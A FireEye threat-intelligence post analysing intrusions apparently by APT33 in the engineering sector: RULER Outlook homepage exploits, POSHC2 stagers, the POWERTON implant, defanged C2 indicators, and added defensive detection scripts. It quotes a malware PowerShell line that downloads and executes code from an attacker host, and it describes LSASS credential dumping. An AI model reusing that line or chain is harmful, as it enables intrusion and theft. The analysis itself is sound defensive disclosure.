
OVERRULED: Containing a Potentially Destructive Adversary


FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks.
has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity
. Recent public reporting indicated possible links between the confirmed APT33 spear phishing
; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

45 days ago, during 24×7 monitoring, #ManagedDefense detected & contained an attempted intrusion from newly-identified adversary infrastructure*. It is C2 for a code family we track as POWERTON.
*hxxps://103.236.149[.]100/api/info
― FireEye (@FireEye)
15, 2018

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an
to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is
. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24×7 monitoring.
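As an added illustration of the document-similarity idea described above (this is not FireEye’s engine, whose features and weighting are not published here), the script below treats each contained intrusion and the known APT33 profile as a bag of the tools and techniques this post reports, down-weights tools that appear in every cluster, and ranks the pairs by cosine similarity; the cluster names and the weighting scheme are assumptions:

```python
"""Illustrative similarity scoring between intrusion clusters.

Added example, not FireEye's engine: each intrusion or known-actor profile
is a 'document' whose terms are the tools and techniques the post reports,
terms are weighted by inverse document frequency (tools seen in every
cluster count for less than rare ones) and pairs are ranked by cosine
similarity. The term sets are read off the post; the weighting scheme is
an assumption and the scores are investigative leads, not attribution.
"""
import math
from itertools import combinations

# Constructed from the activity described in the post (cluster names are ours).
INTRUSIONS = {
    "MD-2017-11": {"ruler", "autoit", "powersploit", "pupyrat",
                   "cve-2017-0213", "procdump", "mimikatz"},
    "MD-2018-07": {"ruler", "ruler.homepage", "cve-2017-11774",
                   "poshc2", "powerton", "autoit"},
    "MD-2018-08": {"ruler", "ruler.homepage", "cve-2017-11774",
                   "poshc2", "powerton", "password-spray"},
    "APT33-known": {"ruler", "pupyrat", "empire", "poshc2",
                    "procdump", "mimikatz"},
}

def idf_weights(docs):
    """Weight each term 1 + ln(N / df): rarer across clusters means heavier."""
    df = {}
    for terms in docs.values():
        for t in terms:
            df[t] = df.get(t, 0) + 1
    return {t: 1.0 + math.log(len(docs) / c) for t, c in df.items()}

def cosine(a, b, w):
    """Weighted cosine similarity of two term sets (0 = disjoint, 1 = identical)."""
    dot = sum(w[t] ** 2 for t in a & b)
    norm = math.sqrt(sum(w[t] ** 2 for t in a)) * math.sqrt(sum(w[t] ** 2 for t in b))
    return dot / norm if norm else 0.0

def rank_pairs(docs):
    """Return (name_a, name_b, score) for every pair, most similar first."""
    w = idf_weights(docs)
    scored = [(a, b, cosine(docs[a], docs[b], w))
              for a, b in combinations(sorted(docs), 2)]
    return sorted(scored, key=lambda s: s[2], reverse=True)

if __name__ == "__main__":
    for a, b, score in rank_pairs(INTRUSIONS):
        print(f"{score:.2f}  {a} <-> {b}")
```

With these inputs the two 2018 intrusions score highest with each other, while their overlap with the APT33 profile rests mostly on POSHC2, which mirrors the medium- versus low-confidence split the post draws.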

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, the publicly available Windows Sysinternals PROCDUMP to dump the LSASS process, and the publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.

Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.

Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

- Username and domain
- Computer name
- CPU details
- Current exe PID
- Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

= { $true }; $webclient = new-object System.Net.WebClient;
$webclient.Credentials = new-object
'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.

Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell “DownloadString” commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”. During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time; this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a
as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).
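As an added example, not from the post, the following hunt applies the indicators quoted above to proxy logs: it refangs the defanged URLs, sorts each request into a delivery stage (homepage exploit, POSHC2 stager, POWERTON C2) and flags any client that fetches a homepage exploit and then reaches a later stage within six hours, which also catches the late-August case where POWERTON was pulled directly. The log line format, the window and the sample lines are assumptions:

```python
"""Added example (not the post's code): hunt proxy logs for the
RULER.HOMEPAGE -> POSHC2 -> POWERTON delivery chain using the post's
indicators. Log format, window and sample lines are assumptions."""
import re
from datetime import datetime, timedelta

STAGES = [  # indicators as the post publishes them (defanged), by delivery stage
    ("homepage_exploit", ["hxxp://91.235.116[.]212/index.html", "hxxp://5.79.66[.]241/index.html",
                          "hxxp://89.45.35[.]235/index.html"]),
    ("poshc2_stager", ["hxxp://103.236.149[.]124/delivered.dat"]),
    ("powerton_c2", ["hxxps://185.161.209[.]172/api/info", "hxxps://185.161.209[.]172/api/default",
                     "hxxps://103.236.149[.]100/api/info", "hxxps://basepack[.]org",
                     "hxxps://staffmusic[.]org/transfer/view"]),
]

def refang(ioc):
    """Turn a defanged indicator (hxxp, [.]) back into a matchable URL."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")

def classify(url):
    """Map a requested URL to a delivery stage, or None if it matches no indicator."""
    for stage, iocs in STAGES:
        if any(url == i or url.startswith(i.rstrip("/") + "/") for i in map(refang, iocs)):
            return stage
    return None

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (?:GET|POST) (\S+)$")  # "<date> <time> <client-ip> <method> <url>"

def hunt(lines, window=timedelta(hours=6)):
    """(host, stages) for hosts that fetch a homepage exploit and then a later stage."""
    seen = {}  # client-ip -> [(timestamp, stage)]
    for m in filter(None, map(LOG_RE.match, lines)):
        stage = classify(m.group(3))
        if stage:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            seen.setdefault(m.group(2), []).append((ts, stage))
    alerts = []
    for host, hits in seen.items():
        start = min((ts for ts, s in hits if s == "homepage_exploit"), default=None)
        chain = {s for ts, s in hits if start and start <= ts <= start + window}
        if len(chain) > 1:  # homepage exploit plus at least one later stage
            alerts.append((host, tuple(sorted(chain, key=[n for n, _ in STAGES].index))))
    return alerts

SAMPLE_LOG = [  # constructed sample lines, not a real capture
    "2018-08-20 09:14:02 10.1.4.22 GET http://5.79.66.241/index.html",
    "2018-08-20 09:14:05 10.1.4.22 GET http://103.236.149.124/delivered.dat",
    "2018-08-20 09:15:40 10.1.4.22 POST https://basepack.org/api/info",
    "2018-08-20 09:20:11 10.1.4.37 GET http://5.79.66.241/index.html",
]
```

A host that only fetches the homepage exploit (10.1.4.37 in the sample) is not alerted by the chain rule, so it is worth a separate single-indicator alert in practice.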

Table 1 contains the operational timeline for the activity we analyzed.

Table 1: Operational timeline (only fragments of the table survive on this page: 2017-08-15 17:06:59; 2017-09-15 16:49:59; APT33 PUPYRAT (Compiled))
